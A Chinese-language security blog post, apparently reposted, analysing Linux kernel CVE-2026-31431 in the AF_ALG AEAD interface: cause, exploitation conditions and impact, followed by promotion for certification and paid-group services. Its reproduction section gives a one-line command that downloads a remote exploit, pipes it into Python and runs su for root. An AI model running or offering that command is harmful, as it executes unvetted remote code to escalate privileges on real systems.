文章总结： 该文档分析Linux内核CVE-2026-31431漏洞，该漏洞位于AF_ALG接口的AEAD实现中，因错误支持原地加密操作导致内存处理缺陷。攻击者可通过构造特定请求触发内核内存破坏，造成系统崩溃或潜在提权风险。文档详细说明漏洞成因、利用条件及影响，并提供修复建议。 综合评分： 70 文章分类： 漏洞分析,漏洞预警,内核安全,应急响应,威胁情报

热点！Linux核弹级提权？（CVE-2026-31431）

原创

MY0723 MY0723

不秃头的安全

2026年4月30日 10:13 北京

在小说阅读器读本章

去阅读

热点！Linux核弹级提权？（CVE-2026-31431）

前言：本文中涉及到的相关技术或工具仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担，如有侵权请私聊删除。
知识星球和交流群在最下方。
需要cn*d（中高）/c2n*d（高与支撑单位）/安全证书请联系vx咨询

Linux 内核 AF_ALG AEAD 实现因错误支持原地加密操作，导致内存处理缺陷，攻击者可通过构造请求触发内核内存破坏。

一、漏洞概述

CVE-2026-31431 是 Linux 内核加密子系统中的一个安全漏洞，存在于 algif_aead 模块（AF_ALG 接口的 AEAD 实现）中。该漏洞源于对“原地（in-place）加密操作”的不当处理，引入了潜在的内存安全问题。

AF_ALG 是 Linux 提供给用户态程序访问内核加密能力的接口，而 AEAD（Authenticated Encryption with Associated Data）是一种同时提供机密性与完整性保护的加密模式。该漏洞正是发生在 AEAD socket 接口的数据处理逻辑中。

二、漏洞成因

在引入 commit 72548b093ee3 后，内核尝试支持 AEAD 的“原地操作”（即输入缓冲区与输出缓冲区重叠的情况）。然而：

在 algif_aead 实现中，源数据与目标数据实际来自不同的内存映射区域 原地操作在该场景下没有实际意义 为支持该特性引入了额外复杂逻辑（尤其是 Associated Data 的复制处理）

这导致在特定情况下：

内存处理逻辑出现异常 数据复制路径存在不一致 可能触发内存破坏或未定义行为

本质上，这是一个由于不必要复杂性引入的内存处理缺陷（memory handling flaw）。

三、利用条件

漏洞利用需要满足以下条件：

攻击者能够在本地系统执行代码（低权限用户即可）
系统启用了 AF_ALG 接口
使用 AEAD 加密接口（algif_aead）
构造特定的输入数据触发异常内存路径

四、漏洞影响

攻击者在具备本地权限（低权限即可）的情况下，可以通过构造特定的 AF_ALG AEAD 操作触发该漏洞，从而可能导致：

内核内存损坏（memory corruption）
系统崩溃（kernel panic）
数据完整性破坏
潜在的信息泄露或提权风险

五、漏洞复现

curl https://copy.fail/exp | python3 && su

六、参考资料

https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/6

https://xint.io/blog/copy-fail-linux-distributions

📄往期推荐：

Burp 大模型Web 漏洞扫描插件 Zack-AI-Scanne

MPScan工具：微信小程序安全审计

工具分享 | FLUX-Web安全扫描工具 v5.4.2更新

CVE-2026-39363：Vite Dev Server WebSocket 任意文件读取漏洞深度剖析

Vim 高危 RCE 漏洞预警：打开文件即执行任意命令（CVE-2026-34714）

关于我们:

感谢各位大佬们关注-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持，考证请加联系vx咨询。

1. 需要考以下各类安全证书的可以联系

①Cn*d，NCC，NVDB🀄️高漏洞证书

②CNNVD中高\漏洞情报\ 一二三级支撑单位均可协助获得

③CISP、PTE/PTS、CISP-DSG、IRE/IRS、NISP一二级、PMP、CCSK、CISSP/CCSP、CISAW各种类、CCRC\CCSC、itil、软考中高级、CDSP各种类、CISA，oscp等等巨优惠。ISO27001、ITss服务项目经理报名等下证即可，证书组团报更便宜，可对公，可开专普票。以下是其他全部证书

【腾讯文档】【信息安全 数据安全 IT认证证书】～不秃头的安全Vx:Meditation0723

https://docs.qq.com/doc/DZmtOckpOakJrcFVv?#

想加群下方二维码，群过期或群满加下方vx拉：

2. 需要入星球的可以私聊优惠

1、维护更新src、cnxd、cnnxd专项漏洞知识库，包含原理、挖掘技巧、实战案例
2、fafo/零零信安 高级会员key
3、最新POC通用报告详情分享思路
4、知识星球专属微信“内部圈子交流群”
5、攻防演练资源分享（免杀、溯源、钓鱼等）
6、新鲜工具分享
7、不定期有工作招聘内推（工作/护网内推）
8、19个专栏会持续更新~提前续费有优惠，好用不贵很实惠

3、其他合作（合法合规）

1、承接红蓝攻防、渗透、安全意识培训、基线核查及加固、应急响应、重保防守、代码审计等安全项目（须授权），需要攻防团队或岗位招聘都可代发、代招（灰黑勿扰）；

2、各位安全老板需要文章推广的请私聊，承接合法合规推广文章发布，可直发、可按产品编辑推广；合作、推广代发、安全项目、岗位代招均可发布；

3、接受脱敏投稿,送一年知识星球及礼包。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：不秃头的安全 MY0723 MY0723《热点！Linux核弹级提权？（CVE-2026-31431）》